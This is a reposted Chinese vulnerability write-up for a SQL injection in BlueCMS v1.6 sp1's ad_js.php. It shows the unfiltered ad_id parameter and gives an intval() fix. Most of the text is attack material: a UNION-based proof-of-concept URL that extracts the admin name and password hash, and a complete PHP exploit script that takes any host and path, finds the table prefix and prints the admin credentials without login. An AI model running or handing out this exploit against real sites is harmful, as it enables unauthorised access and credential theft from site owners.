【转载】BlueCMS v1.6 sp1 ad_js.php SQL注入

BlueCMS(地方分类信息门户专用CMS系统)

基于当今最流行的开源组合PHP＋MYSQL开发
每个分类均可单独设置Title、Keywords、Description，方便SEO
强力模板引擎，显示风格自由定义，随心所欲
多功能模块插件，操作简单方便
智能缓存技术，提高网站性能
多属性模型自定义，栏目功能强大

缺陷文件：ad_js.php

漏洞成因：

12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤，对数字型变量几乎都用了intval()做限制，唯独漏了这个文件，居然只是用了trim()去除头尾空格。。

19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); //直接代入查询。。汗。

修补方案：

$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';

漏洞Poc：

http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

右键查看源代码得到返回数据。

漏洞Exp：
<?php
print_r('
        ------------------------------------------
        BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
        get admin_user pwd-hash without login
        by CnCxzSec衰仔 http://hi.baidu.com/cncxz
        ------------------------------------------   
        ');
if($argc<3){
print_r('
        ------------------------------------------
        usage:php '.$argv[0].' host path
        host: without "http://"
        path: path to bluecms
        example:
        php '.$argv[0].' localhost /
        ------------------------------------------
        ');
die;   
}
$host=$argv[1];
$path=$argv[2];
$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1";
print_r("

exploiting, please wait...");
$fp=fsockopen($host, 80, $errno, $errstr, 30);
if(!$fp) echo "$errstr($errno)<br />\n";
else{
    $head ="GET $path"."$inj HTTP/1.1\r\n";
    $head .="Host:".$host."\r\n";
    $head .="Connection: Close\r\n\r\n";
$result='';
fputs($fp,$head);
while(!feof($fp)){
    $result .=fgets($fp,4096);
}
if (!eregi("document",$result)){
        
    $temp=explode("FROM ",$result);
    if(isset($temp[1])){$temp2=explode("ad",$temp[1]);}
    if($temp2[0])
    $prefix=$temp2[0];
print_r('
        

prefix -> '.$prefix);
    $inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%20where%20admin_id=1";
    $fp=fsockopen($host, 80, $errno, $errstr, 30);
    if(!$fp) echo "$errstr($errno)<br />\n";
    else{
    $head ="GET $path"."$inj HTTP/1.1\r\n";
    $head .="Host:".$host."\r\n";
    $head .="Connection: Close\r\n\r\n";
    $result='';
    fputs($fp,$head);
    while(!feof($fp)){
        $result .=fgets($fp,4096);
    }
    fclose($fp);
    $rs1=strstr($result,"\"");
    $name=substr($rs1,1,strpos($rs1,"|")-1);
    $pass=substr($rs1,strpos($rs1,"|")+5,32);
    print_r('
        

we get it!');
    print_r('
        username:'.$name);
    print_r('
        pwd-hash:'.$pass);   
   }
}
else{
    $rs1=strstr($result,"\"");
    $name=substr($rs1,1,strpos($rs1,"|")-1);
    $pass=substr($rs1,strpos($rs1,"|")+5,32);
    print_r('
        

we get it!');
    print_r('
        username:'.$name);
    print_r('
        pwd-hash:'.$pass);
   }
}
?>